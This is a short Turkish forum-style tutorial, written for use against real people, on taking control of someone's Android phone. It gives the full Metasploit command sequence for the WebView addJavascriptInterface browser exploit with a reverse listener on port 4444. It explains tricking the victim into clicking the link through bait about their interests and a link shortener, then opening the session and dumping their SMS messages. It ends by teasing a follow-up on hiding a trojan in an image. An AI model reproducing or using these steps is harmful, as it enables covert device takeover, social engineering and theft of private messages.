İp İle Sızma Exploit Methodu
öncelikle dış ip nizi herhangi bir siteden öğrenin
metasploiti çalıştıralım
adımları sırayla uygulayın
use exploit/android/browser/webview_addjavascriptinterface
set SRVHOST dışip
set URIPATH /
set LHOST dışip
set LPORT 4444
show advanced
set VERBOSE true
set ReverseListenerBindAddress dışip
set ReverseListenerBindPort 4444
run
verilen using url yani (http://dışip:8080/) linkini
kişiye ulaştırın tıklaması halinde telefon sizin kontrolünüzde
terminali kapamayalım!!!
gelelim işin fantezisine adamı nasıl kandırcaz adamı tanıyorsanız ilgi alanı ile alakalı bişeyler söyleyin peki
site işine gelince termux tooları vardı link kısaltma diye onu kullanın bc.vc vs kullanırsanız adamın karşısına reklam çıkar
kafası karışır ama termuxdaki sadece domain ismi değişiyor reklam felan yok
adam tıkladı diyelim metasploite gelip
sessions -i l
help
karşısındaki harfli parametreyi girerek örn dump_sms gibi mesajları gösterir
Bu işlemde 2 adet sıkıntı
1 sadece mobil işletim sistemleri için =(
2 chrome tarayıcı ile girmemesi lazım chrome de js zaafiyeti şuanlık yok.
Part 2 Görsele (jpeg.img.jpg) trojan yerleştirme gelicek beğenilirse.
EmojilerEmojiler